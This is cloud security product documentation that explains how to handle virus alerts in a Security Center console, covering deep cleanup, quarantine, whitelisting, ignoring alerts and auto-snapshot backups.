The antivirus feature of Security Center supports deep virus scans, generates alerts when viruses are detected, and handles virus alerts. This topic describes how to use the antivirus feature to handle virus alerts.

Background information

The antivirus feature provides deep virus scans and removes persistent viruses. You can use the antivirus feature to handle the following types of viruses:
  • Ransomware
  • Mining programs
  • DDoS trojans
  • Trojan programs
  • Backdoor programs
  • Malicious programs
  • High-risk programs
  • Worms
  • Suspicious programs
  • Self-mutating trojans
Note The preceding types of viruses pose significant threats to your servers. Security Center generates alerts when these viruses are detected. We recommend that you handle the virus alerts at the earliest opportunity.

Procedure

  1. Log on to the Security Center console.
  2. In the left-side navigation pane, choose Defense > Anti-Virus.
  3. On the Anti-Virus page, click Process Now.
  4. Find the alert that you want to handle and click Processing in the Actions column.
    To handle multiple alerts at a time, select the required alerts and click Batch handled in the lower-left corner of the page. You can also click Processing above the alert list to handle all virus alerts.
  5. In the Alert handling dialog box, select a method to handle virus alerts.
    The following table lists the methods that you can use to handle virus alerts.
    Method Description
    Deep cleanup Select Deep cleanup to remove the viruses on your servers.
    Security Center experts have conducted tests and analysis on persistent viruses. Based on the test and analysis results, the experts develop the Deep cleanup method to remove persistent viruses. The following list describes how to remove persistent viruses by using the Deep cleanup method.
    • Terminate malicious processes

      Terminate running malicious processes to prevent viruses from compromising your servers.

    • Quarantine malicious files

      Quarantine malicious files to prevent attackers from restarting them. You can analyze the risks or restore the processes that are terminated by mistake. For more information, see Quarantine files.

    • Delete the persistent tasks injected by attackers

      Attackers exploit crontab tasks and malicious download sources to inject persistent tasks. The tasks keep injecting more persistent viruses. Security Center can analyze and remove the persistent tasks. It also uses AI learning to reinforce the security of your servers and remove viruses within a few hours.

    In the Deep cleanup mode, you can enable auto-snapshot to back up your system disks before you remove the viruses. This reduces the risks of data loss when you remove the viruses.
    Note You are charged for the auto-snapshot service. For example, if the size of the system disk is 40 GB, the fees for snapshot storage are USD 0.005 per day. For more information, see Snapshot.
    Whitelist Click Whitelist to add an alert to the whitelist. After the alert is added to the whitelist, Security Center no longer generates alerts when the alert event reoccurs.
    Ignore Click Ignore to ignore an alert. After you ignore the alert, the status of the alert changes to Ignored. If the alert event reoccurs, Security Center generates alerts.
    Handled manually If you have manually handled the alert, select Handled manually. After you select Handled manually, the status of the alert changes to Handled.
  6. Click Process Now.